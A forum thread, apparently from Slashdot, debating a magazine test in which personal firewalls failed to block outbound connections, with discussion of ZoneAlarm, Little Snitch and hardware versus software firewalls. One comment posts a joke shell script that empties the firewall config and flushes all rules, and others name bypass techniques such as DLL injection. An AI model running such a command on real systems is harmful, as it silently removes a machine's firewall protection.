I find it very interesting when I install some software and
my ZoneAlarm pops a window showing me it's trying to phone home.
(Adobe is the worst when it comes to this.)

Windows should be have a built-in white-list for outgoing network connections,
including a help link to a web page (or a wiki) showing what propram is sending what to where and why!

Re:Annoyance

[robogun]

Zonealarm does it. Deny everything unless you KNOW it has to connect. Mail & browser for most people. It will only ask once per app. What's so hard about that?

Re:Annoyance

[Tim+C]

Personal firewalls do not block outbound connection because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that?

Yes, and I took the time to train/configure the firewall. Now it will warn me about a new app trying to make connections for the first time, but that's a rare enough occurence that it's no problem at all (and is of course entirely expected).

Users are clueless about it

Yes, most users are - but they generally don't care about outbound traffic. Protecting them from inbound traffic is far, far more important, and in that respect, software firewalls do a fine job.

Re:Annoyance

[GangsterOfBoats]

First, this article doesn't name the products tested. Second, firewalls need to be configured in order to maximize security; regardless of whether they are hardware or software firewalls. If you take a stateful packet inspection firewall, such as the one included in F-Secure's AV Client Security or Internet Security 2006, then you have a piece of software that is fully capable of regulating inbound and outbound trafiic. One thing I like about the F-Secure firewall is that it intercepts the packets at the network layer of the OSI and fortifies itself in the OS to prevent applications from hijacking it. Another thing to consider is that users who take their laptop outside of thei network no longer have a hardware firewall sitting in front of their connection.

Re:Annoyance

[GnuTzu]

Knowledge is power...

Assuming:
1) You let the firewall provide the knowledge
2) You act on the knowledge

The problem is not the firewall, but that people choose ingorance.

I like knowing what software makes outgoing connections, and this is what I like most about personal firewalls.

OpenBSD PF

block out from any to any

Defeat that, muthafugga!

Re:OpenBSD PF

[Penguinisto]

"Defeat that, muthafugga!"

Sure - just run this little, umm, 'booster' script:

--
!#/bin/sh
cat /dev/null > /etc/ipf.conf
ipf -Fa -f /etc/ipf.conf
wall "pwn3d!"
--

(...point is, if something bad is already in there, and it has the right perms, no firewall is going to save you. None.)

/P

Re:OpenBSD PF

TWEEEEEEEEEET! Five minute penalty for an invalid shell script magic number and an additional nomination for a UUOC!

>/etc/ipf.conf will empty the file or use ipf -Fa -f /dev/null... ;)

Re:OpenBSD PF

[Penguinisto]

">/etc/ipf.conf will empty the file"

Yep - which prevents most newbies (who likely cut + pasted their rules in from the tute at freebsd diary anyway) from rebuilding it immediately (evil grin).

...and, umm, forget the typo.

/P

Simple

[The+Cisco+Kid]

A firewall is a *device* between a device that needs 'protection' (usually a Windows PC), and an Internet connection. Keyword *device*, as in a seperate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless. 'Software Firewall' is an oxymoron.

Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

Re:Simple

[The+Cisco+Kid]

Correction - the most effective method, *if* one assumes the constraint that the PC must be running Windows. The *most* effective would be to simply not use Windows, but the driveling masses accept happily whatever crap the consumer OEM's spoonfeed them (via the consumer retail and online outlets), and it will be a long time before enough of them will be able to escape Microsoft's clutches.

Re:Simple

[_Swank]

because it's completely impossible that someone might CHOOSE to use windows over linux. completely, undeniably, impossible.

*BZZZZZZT* wrong.

i CHOOSE to use windows. 90% of what i do on a daily basis could be done in either. with a decent amount of extra effort, i could probably get that last 10% working under linux. but in my opinion, linux just isn't there yet. xp, warts and all, allows me to be more productive. yes, i have a linux partition on my laptop (that doesn't get much use). and i have linux vms available for various uses when i need them for certain development testing needs (and these get more use). but i'm in windows 98% of the time, because it's easier.

and as my laptop goes with me, it's connected mostly to unsecured wireless networks and since it's utterly incomprehensible that the only acceptable firewall could come in the form of a separate device that i'd have to carry around, i run a software firewall and virus protection software under windows. and i have NEVER gotten a virus of any sort. these are not going to be perfect. but they're the 95% solution (at least). and that's good enough considering the practicality of the alternatives.

but your microsoft bashing is insulting. not because microsoft is the patron saint of software, but because those of us who choose to use it are not automatically idiots.

Re:Simple

"A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless."

You are correct in part. The software changes the operation of the underlying system to an extent, and those changes can be beneficial. Is it a replacement for good security practices? No. Is it going to be 100% effective? No. Can it help? Yes.

Simply having the ability to monitor and log traffic (simple in Unix, not so in Windows) can help, depending on the person. Being able to drop unsolicited incoming traffic also is a major plus. It certainly helped when living in the dorm where the networks were rampant with unfriendly activity and I had neither the hardware or the expertise to set up a real firewall.

Re:Simple

[RockModeNick]

I have to agree on a certain level, I just keep up with my microsoft updates, and I've never had a virus I didn't put there on purpose to figure out how to remove it from a friend's machine before a fix was released. If you are intelligent enough to run *ix(have briefly) you are intelligent enough to never get a virus or any really nasty malware on a windows PC.

Re:Simple

[jimicus]

Amazing.

"Software Firewall" is an oxymoron......Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based

What do you think a unix-based (or for that matter proprietary) firewall is based on - software.

If you mean "Running a firewall on the system you're supposed to be protecting" is a bad idea, I'd generally agree. But if you're most concerned about blocking incoming connections, that's less of an issue.

Ideally you'd never get any malicious (sp?) software on your system, so blocking outbound traffic is a non-issue. But in the Windows world, particularly if lots of people are using a system, you can't guarantee that.

Re:Simple

[Tim+C]

The *most* effective would be to simply not use Windows, but the driveling masses accept happily whatever crap the consumer OEM's spoonfeed them

The funny thing is that just this last weekend, a friend of mine discovered that his home Linux server had been hacked. Someone managed to break in remotely and get root.

So while using something other than Windows makes you safer, it most definitely does not make you invulnerable.

Oh, and less of the "drivelling masses", thanks - some of us choose to use Windows for entirely practical reasons, and yet somehow manage to remain virus and rootkit free.

Re:Simple

[everett]

And people that hit themselves in the head with a hammer aren't automatically idiots, but they're most definately masochists. You have a choice, and you've chosen to go with ease of use and convenience at the expense of security and system reliability. There's nothing wrong with that, it's just not the choice that most /.ers would choose.

However, as you said not all windows users are automatically idiots, but verily you can see the foolishness in proclaiming the superiority of a flawed system, just because you have a '95%' solution? What happens when that unexpected 5 out of 100 attack occurs and your system gets fugged up? Is your data secure? Is it valuable enough that you take measures to protect it? Because if not, then truly you're asking for devastation using a system that isn't 100%.

Re:Simple

I just love useless maoist responses like this.

Re:Simple

[_Swank]

completely agree with what you say. though the great great grandparent post indicated that windows software firewalls were completely useless and the only real firewall option for us 'driveling masses' who aren't smart enough to be able to escape from microsoft's evil embrace would be to use a separate device (running *nix) that would handle the firewalling for our completely inept microsoft platform products. this iscompletely impractical (if we're too dumb to not choose ms, we're not going to be able to properly work that device and keep IT from being hacked -- because just because it's linux doesn't mean it can't and won't) and, quite simply, just ms bashing flamebait. to the contrary, the software products (combined with regular updates of the OS and other pertinent software) will provide the required level of protection for most people. this is the exact same thing that would be required for a separate firewall device. i am not trying to claim that windows is inherently either more secure or more stable than linux and other unix variants.

as for the 95% statement. i meant more that windows + software firewall + virus scanner will work correctly and acceptable for 95% of users. rather than it would stop 95% of attacks.

Re:Simple

[egypt_jimbob]

and i have NEVER gotten a virus of any sort.

That you know of. Do you monitor all of your outbound connections 100% of the time? Do you have some way of determining that every packet of normal-looking web traffic is in fact normal? What about DNS? SNMP, SMTP, ICMP, UDP? Lots of malware simply sits in memory waiting. It can hijack processes so that http traffic looks like it's coming from your normal webbrowser. It can wait until the system has been idle for an hour before attempting any connections.

If something evil gets into your box, your box can never again be trusted to tell you the truth about anything until you've reinstalled the operating system or restored from backup (which isn't always as clean as you think).

Re:Simple

A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless.

Bullshit. You don't know very much about security. Software firewalls are not the Holy Grail, but they are very useful tool in overall security, and can greatly mitigate computer attacks.

Here's a concrete example. In the latest round of microsoft flaws, MS reported a flaw in the "Server" service that is remotely exploitable. By using a software firewall (and good configuration), attackers can't exploit this flaw BECAUSE ATTACKERS CAN'T CONNECT TO THE SERVER SERVICE because the software firewall blocks their access.

Do you see the value now?

Suppose the idiot user gets some spyware on the computer, and the spyware tries to pop up some ads. The spyware is unable to connect to the internet to get the ads, because the software firewall blocks their access.

Do you see the value now?

Suppose the idiot user gets some spyware on the computer, and the spyware tries to connect to an IRC channel to get instructions to be a spambot. The spyware is unable to connect to IRC or send email, because the software firewall blocks their access.

Do you see the value now?

Further, there is all sorts of software that tries to connect to the internet behind your back. Adobe, Word, Quicktime, iTunes, media player, realaudio all connect to the internet without your permission or approval. A software firewall blocks their access until YOU authorize it. Is Media Player just downloading a new codec from Microsoft? Or spying on you? I don't know, and I don't trust MS that much.

Do you see the value now?

instead running either a proprietary platform or (preferred) something unix-based.

An external firewall is also useful, but almost all don't identify the source of the traffic. Most firewalls will allow port 80 & 443 traffic so that you can browse the web. But an external firewall doesn't identify the source. Is this port 80 connection just going to a regular website? Or is this some spyware downloading instructions & programs from a compromised webserver?

The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

Hey, we actually agree on something.

Re:Simple

[Lord+Ender]

Your name is "Cisco Kid" but you don't understand the basics of network security? Ouch.

Lets prove that your unfounded assertion (that software firewalls are "completely useless") is wrong.

Suppose Jane uses her computer for email, web browsing, document writing, and instant messenger. She knows only the basics of computing: communication software needs to access the internet, other software does not. She uses a personal firewall, and clicked "always allow" when it asked her if her web browser, email, and messenger program tried to access the Internet. She uses her computer for six months and is never bothered by the PFW again. One day, she receives a Microsoft Office document (from email or instant messanger, doesn't matter) and she opens it. Unbeknownst to her, this document is malformed to cause a buffer overflow. Because there is a limit to the size of the code that can be executed in the BOf, all the code does is connect to the internet and download the REAL payload (which does bad things to her computer). As she opens the document, Word crashes and her firewall pops up and says: "Do you want to allow Microsoft Office to access iruiautjkljvklajf.ru?" She knows Office documents don't use the Internet, so she clicks "No."

There you have it. This "completely useless" personal firewall, combined with her very basic understanding of the Internet, saved her computer from being used in a botnet and all her data being destroyed.

If that's what you call "useless," you aren't qualified to discuss information security.

out/in hmm

Seemed the intention of firewalls originally(at least for personal use) was to keep people out.
As people began to get broadband and leave there computers hooked up and turned on all the time it
became important to have a firewall in place(hardware at least) to keep a low profile on the net.

Cause for awhile people were getting there home computers hacked into that didnt have a firewall
in place.

Seems they work at least some what in that respect. As for trying to get out and off of your computer
that might be a job for something else perhaps?

Blocking outbound traffic really sucks, especially things like norton that reblock you online game every time
the exe gets patch. But most of the time the game launches and locksup because you cant see the box to let
pass. And there is no, allow always all the time, so every patch causes the problem.

ah well, I think some common sense is in order on what you download and what you run on your own machine.

there is no 100% solution to the firewall question

[PrescriptionWarning]

it just seems to me that the imperfection of anything man-made will only ever get you at best a 99.9% solution. Just use some common sense and pick your software and hardware carefully to close that gap as much as possible.

ZoneAlarm?

[CyberZCat]

Did they test zonealarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was spesifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.

Re:ZoneAlarm?

[voice_of_all_reason]

I'd certainly be interested in a way to shut it down manually as admin, if you know a way. If it ever bugs up and goes into "turtle mode", you're basically forced to do a reboot because it locks the internet and won't allow you to close it through task manager.

Re:ZoneAlarm?

[Jeff+DeMaagd]

I had an occasional problem where the ZoneAlarm controller would not accept any clicks. I see a dialog box but eventually it does not allow me to click accept, deny or the check box to learn my setting. I end up killing it, uninstalling it and running Kerio Personal Firewall instead and that generally doesn't cause me any problems like that. It does block internet ads or site counter systems by default so some sites just don't work, but that's the extent of my issues with KPF.

Re:ZoneAlarm?

[faloi]

Chances are, based on the text of the article, ZoneAlarm would've failed too. The title and description are a bit misleading. One of their tests, as an example, was to hack a way out through the browser. Since the browser already (typically) has rights to get on the wire, ZoneAlarm probably wouldn't flag it.

Personally, I think their tests are sort of flawed for showing holes in the firewall itself. I've used ZoneAlarm for a while and think it does a great job.

Re:ZoneAlarm?

[Jeff+DeMaagd]

I forgot to mention that turning off ad blocking in KPF fixed the site blocking issue, there's a setting in the control panel.

Re:ZoneAlarm?

[Beryllium+Sphere(tm)]

>even with my best efforts to circumvent it (for testing), it's still able to block everything.

Did you try DLL injection?

Re:ZoneAlarm?

[in2mind]

I too use Zone alarm. Recently installed SP2 on XP,and something seems to be downloading inspite of having scheduled Automatic updates to run someother time. Iam pretty sure that the s/w thats downloading content from the net is Win sutoUpdate - mainly because this problem wasnt there before SP2 was installed.

And...ZoneAlarm couldnt help me figure it out & block that software.

Any suggestion on which s/w to use to see which process is actually doing the downloading part?

Re:ZoneAlarm?

ZoneAlarm is trivial to bypass with a WSH / VBS script or any other way of sending windows messages. I.e. virtually every windows programming language. All "personal firewalls" that I know of are vulnerable to the same approach. Use of non-standard widgets etc could complicate this attack but I can't see any obvious way to prevent it entirely.

ZoneAlarm example

Also it used to be vulnerable to process memory injection, they've probably fixed that by now though.

Re:ZoneAlarm?

You are an idiot.

Blocking outbound connections silly

[EsbenMoseHansen]

Blocking outbound connection from a computer is pretty silly initiative in any case. Firewalls are for blocking inbound connections and for enforcing policies between networks (e.g, between the home network and the internet). Only in the latter case does blocking outbound traffic matter, and only as a last ditch "woops, I forgot to restrict this service so now I'm broadcasting sensitive information to the world!" sort of thing. It certainly doesn't hinder worms and their ilk much. And don't get me started on that silly checksumming of applications :)

Re:Blocking outbound connections silly

[grub]

Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc..

Re:Blocking outbound connections silly

[lightyear4]

Or for preventing a compromised box from DOSing the rest of the world.

Re:Blocking outbound connections silly

[EsbenMoseHansen]

Blocking outbound traffic has been very useful for spanking people who think running Kazaa/eMule/BitTorrent/etc. at work is a good idea. Or for blocking access to outgoing SMTP so users have to use the corporate mail box, etc..

Firstly, that is negotiating traffic between networks (here, the office LAN and it's internet connection. I'd be a bit surprised if it works, but maybe it takes out some of the more stupid employees. For my money, just saying "please don't do that" seems to be a better idea in this case, though.

E.g, many people run their SMTP servers on another port (1025, 2025, 26 all seem popular) to get around the silly SMTP restriction. Likewise, I can't imagine it's hard to configure eMule to avoid detection by (let's face it) the rather stupid firewalls.

Re:Blocking outbound connections silly

[EsbenMoseHansen]

Or for preventing a compromised box from DOSing the rest of the world.

For stopping, sure. But for the initial wave, wouldn't a DDOS just use a commmon, open port like 80 or 443? Here I am assuming a external firewall, as a software firewall on the rooted (!) box itself is presumably disabled.

Re:Blocking outbound connections silly

[grub]

"Negotiating traffic between networks" is what a firewall does, right? And "Please don't do that" seems to not work with our summer students :) It's easy to reconfigure eMule but the remote end has to be running on that port. Regardless, the nature of our facility (biomedical research, human studies, etc.) dictates we control traffic well. By default we block all outgoing traffic except for well known services (http, https, etc.) and those allowed out are passed through a socks or squid proxy which cleans up lots of other crap.

Re:Blocking outbound connections silly

[EsbenMoseHansen]

Besides the good old network-2-network firewalls, there are the "Personal" firewalls regulate which application are allowed to connect. Those are what the article are talking about. If you do not agree with the terminology, I can understand, but I think that rabbit is rather out of the box.

And using proxies is just about the only way if you want to only have one type of traffic, provided that the inside people have no conspirators (including themselves) outside the firewall. If they do, you have lost whatever you do short of pulling the plug, though it would probably be tiresome/slow enough that most won't bother. As you most likely know already given that you can set up the network mentioned above. You wouldn't catch me working in such a place, though :)

In any case, I'm getting off topic :)

Re:Blocking outbound connections silly

[arminw]

.... It certainly doesn't hinder worms and their ilk much. And don't get me started on that silly checksumming of applications....

Mac OSX has an interesting feature that should at least alert a user that something fishy is happening. Any executable trying to run the very first time, triggers a dialog that asks the user if that should be allowed. It adds the warning that the program could be malicious. Then the smart users may cancel the starting of that program.

Re:Blocking outbound connections silly

[budgenator]

Blocking outbound connection from a computer is pretty silly initiative in any case
What's trying to get out is usualy more important to me than what's trying to get in because it gives clues as to what has gotten in and what's not programs aren't behaving like they work for me instead of somebody else.

Re:Blocking outbound connections silly

[EsbenMoseHansen]

Any executable trying to run the very first time, triggers a dialog that asks the user if that should be allowed. It adds the warning that the program could be malicious. Then the smart users may cancel the starting of that program.

I know this looks smart. But it isn't. Don't you think that a potential malware programmer would know this and work around it? Like writing "You will now get this and this dialog. This is normal, just hit ok." Or do their stuff indirectly through another application that is permitted to do the network operation. Or whatever.

I believe this feature originates from windows firewalls, but I wouldn't know for sure.

To summarize: That feature is a bad idea, because it requires that the malware author works with the system, not around. Thus, it easily instills a false sense of security, while providing very little real benefit. The fact that it is installed per default makes it even worse; at least in window the malware author might not have tested with this particular firewall implementation.

Re:Blocking outbound connections silly

[arminw]

........."You will now get this and this dialog. This is normal, just hit ok." ....

NO malware dialog can come up until the user gives OK to that warning. If the user doesn't click OK, nasty program cannot start. Also, in order to install programs, a user is asked for an admin password. There is NO way any program can install or run without user input; at least I have not heard of one. Unfortunately there is no protection for a dumb user in any OS. However, it is impossible to infect an out of the box Mac by simply connecting it directly to the Internet, firewall or no. All of the tiny amount of supposed Mac malware to date requires user action and the ignoring of warnings. Hackers would LOVE to have the bragging rights of having humiliated the admittedly and rightly smug Mac users by doing to Macs what is commonplace in the Windows environment. Maybe someday it will happen, but meanwhile I will not hold my breath.

I'm still reading articles of users connecting a Windows box to the Internet and getting infected before the needed patches can be downloaded and installed.

Re:Blocking outbound connections silly

[NMerriam]

Like writing "You will now get this and this dialog. This is normal, just hit ok." Or do their stuff indirectly through another application that is permitted to do the network operation. Or whatever. ...
To summarize: That feature is a bad idea, because it requires that the malware author works with the system, not around. Thus, it easily instills a false sense of security, while providing very little real benefit.

I think you misunderstood -- OS X prompts you the first time an application is run (or if it has been changed), it has nothing to do with the network. So if you didn't change it, why would you be looking at instructions on which buttons to click? And they can't do anything through another application, because the first application can't spawn the second until you've authorized it to run.

So yes, it is beneficial, as long as people actually pay attention to it and don't blindy authorize anything that pops up. That hasn't been much of a problem in my experience, since OS X doesn't pop up nearly as many confirmation dialogs as Windows, and the users don't get desensitized to them.

The outbound firewall most people use on OS X is Little Snitch, and while it is far and away better than most of the Zone Alarm/Norton stuff on windows, it is still vulnerable to simple circumvention like attaching the data to Safari.app or something like that. It is more intended to catch apps phoning home (hence the name) and that sort of thing, not actively malicious behavior.

Re:Blocking outbound connections silly

[EsbenMoseHansen]

NO malware dialog can come up until the user gives OK to that warning

True, however, the dialog would be quite common, and how would a non-tech savy user know whether a fancy background changer (or whatever) needs internet connection?

Also, in order to install programs, a user is asked for an admin password. There is NO way any program can install or run without user input; at least I have not heard of one

Sound and sober steps, which any decent OS takes. It is also rather irrelevant re firewalls :)

As for the rest of the comments, I'm sure Mac is as secure as a proprietary system can be, and certainly, windows is reported to have many flaws. As I don't use either, I really don't want to give my opinion on that subject. My point was simply that inward facing firewalls (blocking outbound connections) are a silly invention, in my humble opinion.

Which software?

[jtroutman]

I'm just curious, since the article doesn't mention it, but which firewalls were tested? I've look at the website for the magazine that did the testing, but my German is rather rusty and I can't seem to find the original article. The only one mentioned in the article is the Windows XP firewall.

Re:Which software?

[emil10001]

I too was curious about this. It seems the audience is M$ users, so I wonder how the built-in Linux or BSD firewalls would fair.

Re:Which software?

[Lambticc]

_G Data InternetSecurity 2006 _F-Secure Internet Security 2006
_Kaspersky Internet Security 6
_Trend Micro PC-Cillin 14 Internet Security
_Symantec Norton Internet Security 2006
_Zonelabs Zonealarm Internet Security 2006
_McAfee Internet Security Suite 2006
_Computer Associates eTrust Internet Security Suite r2
_Panda Platinum Internet Security 2006
_Softwin Bitdefender 9 Internet Security

This is all I could find from the german site PC Progressionell ..meine Deutshe ist nicht so gut.

Re:Which software?

[jtroutman]

Thanks, I was wondering if they had tested ZoneAlarm. I use Pro and have to say that it has done a remarkable job of keeping out what I want out and keeping in what I want in. I'd be very interested to see an English translation or rewrite of the findings.

Re:Which software?

[AnalogDiehard]

_G Data InternetSecurity 2006
_F-Secure Internet Security 2006
_Kaspersky Internet Security 6
_Trend Micro PC-Cillin 14 Internet Security
_Symantec Norton Internet Security 2006
_Zonelabs Zonealarm Internet Security 2006
_McAfee Internet Security Suite 2006
_Computer Associates eTrust Internet Security Suite r2
_Panda Platinum Internet Security 2006
_Softwin Bitdefender 9 Internet Security

No mention of Black Ice by Internet Security Systems. I asked our company admin what he recommended for a software firewall and Black Ice was his answer.

I've been running Black Ice since 2002 and have had zero intrusions (I also run Mozilla with Javascript enabled). It even stopped MSBlaster in its tracks, and I told it to ignore it forever so it wouldn't nag me. I know a friend who is a very experienced "hacker" and he said Black Ice takes hours to break through. You can buy it at Staples for $40.

Re:Which software?

[enbody]

They recommend updates which on Windows XP gets you a software firewall. They should have included that firewall in their evaluation.

Purpose of a personal firewall

The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.

I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.

But when it comes down to it, a firewall is as strong as it's weakest link, which is almost always the enduser. Running as admin while browsing, downloading software from untrusted sources, don't blame the firewall for user stupidity.

Re:Purpose of a personal firewall

first line of defense is 220kV on your (metalic) keyboard? Which (2nd line of defense) activates a guillotine on keypress?
</bofh>

Re:Purpose of a personal firewall

Keep in mind that it's not always user stupidity - there are plenty of Windows users who have to use specific and often special-purpose software that insists on running under an admin account, so the user is unfortunately left with little choice because of programmer stupidity.

So sorry

[voice_of_all_reason]

Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet

Yeah, what a drag that their software is not completely immaculate. Let us know when you code the world's first perfect application, sparky.

And how exactly does "not perfect" translate to "useless" again?

Re:So sorry

[Hoi+Polloi]

Since antibiotics don't cure all known diseases I say we get rid of them too.

They just didn't have enough firewall.

[Colin+Smith]

Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.

Re:They just didn't have enough firewall.

[rcw-work]

I hereby vow to refer to personal software firewalls as "cowbell".

Little Snitch

[GeffDE]

The article (to my view) didn't mention any of the names of the programs, and I don't speak or read German, so I don't know how to find the names.

But I would swear by a nifty little app (for mac), Little Snitch which does seem to block both outgoing and incoming traffic perfectly.

Re:Little Snitch

[Steve+Ballmer's+Fat]

I would second the notion that Little Snitch is fantastic! However, it should be pointed out that Snitch does NOT block incoming traffic, and it is not intended to.

Re:Little Snitch

Little Snitch only blocks outgoing traffic, and then you have to delete all the default rules to catch a lot of processes doing stuff you didn't know or need doing.

Also Little Snitch has a habit of giving a program or process "blank access" to a particular port when you only gave it permission to contact a certain IP address.

Some programs/processes use/mimick another program/process that already has this blank access.

For instance if you give "curl" permission to the internet, another program or process can call this routine and make a internet connection.

Still it's better than nothing.

Re:Little Snitch

[HTH+NE1]

Indeed, Little Snitch is wonderful. If only there were a version for other OSes other than Mac OS X.

duhhhh....

[WaterDamage]

Most in the IT business have known this for years. Microsoft only makes the issue worse by fooling the general public into accepting that the firewall in Windows XP is sufficient to keep them safe. McAfee is one of the few players with a good personal firewall that manages to lock down the system pretty well but it's definitely too complex for the average user. There isn't much that can be done until the general population gets more educated as time goes on. In the meantime, it's job security for IT people.

WORK HARD, millions on welfare are depending on you!

Re:duhhhh....

[Akaihiryuu]

I used to work tech support for Verizon DSL (ick) and we saw problems with this all the time. People would have Mcafee installed and it would spontaneously decide to deny IE outbound access. (Now, customers using IE is a whole separate can of worms, but I don't feel like writing a novel so I won't go into that here...I "fixed" many computers by removing the IE shortcut from the desktop and installing Firefox.) The Mcafee issue happened frequently enough that I doubt it was something that the user misconfigured, some of the people didn't even know they had Mcafee (it came with the computer). The symptoms would be: you could ping anything you wanted, but any attempt at websurfing would time out, even to other devices on the LAN (like the cheap routers we supplied). I even saw times where Mcafee would deny access to the 192.168.x.x LAN address but allow general internet access. We didn't support firewalls when I worked there, so the customer was instructed to disable the firewall and then access came back. Trying to use a firewall to block *outbound* traffic is kind of dumb. If there's malicious software on your computer, it's already too late for more software to solve the problem.

Re:duhhhh....

[budgenator]

I didn't install the McAfee personal firewall, because of how much of a pain in the ass the McAfee AV has been since I installed it. What happened is the wife got a Dell pre-loaded with WinXP and of course there is one account with Admin privs. I finally talk her into letting me install an user account for me, and later the stepson. Well the step son gets into the habit of picking up viruses so we take decide to away his admin privs, and everbody's admin privs so he didn't feel picked on. Well that was the start, it seems that when you have an account with admin privileges, windows in it's weirding ways, locks it so only that user can access the files, this kinda sort of makes sense when the user has admin privs, because there may not be an actual admin account or there maybe multiple admin accounts( how stupid is that). When you create an admin account and down-grade the user accounts to non-admin privs, admin can't access the user account's files, which doesn't seem so bad until you run across a site that says you need to update flash. Naturaly you download to a conveintient place, like your desktop, right click, run as admin then get a permission denied! The only way you can install is to change users to admin (which still can't get to user's files) re-download and install, which means that you have to wait 15 minutes to start because of all the pre-loaded, ET-phone home crapware that never should start in admin's account anyways! ( I did have an epipany, putting the download into a shared folder, and then try the run as) Why is McAfee a pain in the ass you ask, because in my situation McAfee can't install the updates it insists on downloading everytime I log on to the computer. To keep McAffe updated, I have to boot, login as admin, logout, login as user to actually go from boot to useable, safe desktop take 20 - 30 minutes!

Any windows gurues with Ideas on how to fix this?

Re:duhhhh....

[smellsofbikes]

I have a very similar symptom but in my case it's somewhere in the guts of my Qwest DSL modem. I can ping anywhere but sometimes, randomly, it'll stop resolving DNS *and* ip addresses, and I have to go cycle power on it. Stupid thing. What's kind of odd is that it happens about 6 hours to several days earlier on the Windows machine than on the 2 linux machines: they're still chugging along well after Windows starts saying it can't find google.com. (and sometimes if I'm really lucky it'll be able to find IP addresses but not be able to find names, so I've gotten good at memorizing big sites' ip addresses.)
Stupid quest dsl modems.

Little Snitch for Mac OS X

[toupsie]

Mac users don't think you are safe because you aren't running windows. It's amazing the number of Apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.

Bad article, no donut

[Chairboy]

The article makes a number of critical errors that impact its credibility.

The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.

Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.

Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy nilly, they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, that gives even more protection.

The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.

Re:Bad article, no donut

[JimMelton]

Well said.

Result of Fundamental Flaw

[JBHarris]

A fundamental concept in computing now-a-days is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more-intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.

I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously....you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.

The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.

Brad

Question

[geeber]

So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?

Re:Question

[legoburner]

Although they do not provide much benefit, it can sometimes be worth it, especially if you have a wireless network behind your firewall. One rogue worm-ridden computer on your wireless network and bad things can happen to all your machines. Having a software firewall will be consume resources and might annoy you from time to time, but will reduce the chance of infection from common worms. You should never presume your internal network is secure unless you can completely verify every last bit that comes in to it.

Re:Question

[SCHecklerX]

Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things. For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

For a skilled user (which these aren't marketed to anyway), there is value in anlyzing what your software is trying to open outbound connections to, if you tell your PFW to alert you. In the hands of a skilled user, this is good information and the PFW is a good tool to analyze what software you may want to ditch or restrict. Again, this isn't the demographic most PFW vendors market to. You can't use a tool like this without a basic knowledge of how TCP/IP works. Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

Re:Question

[lotrtrotk]

We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

Consider the 70 year old who got his license back in 1950 and still drives. Surely, things have changed a lot from his day and realistically he wouldn't be able to pass a drivers test in 2006.

Well, with the internet this will happen every single year. Having a license wouldn't mean anything.

Re:Question

[SCHecklerX]

The concepts involved (port/protocol/subnet/hostname/client/server, etc) have not changed since I have been playing starting around 1994. Yes, it will change when IPV6 is adopted, but we ALL have some learning to do when that occurs.

Re:Question

You cant risk breaking the oomputer hardware and software marketing and sales BS bubble.
A computer is not and never will be a consumer device!
  To not know how it works at a better than average level is to be victimized by ones own ineptitude

Re:Question

[99BottlesOfBeerInMyF]

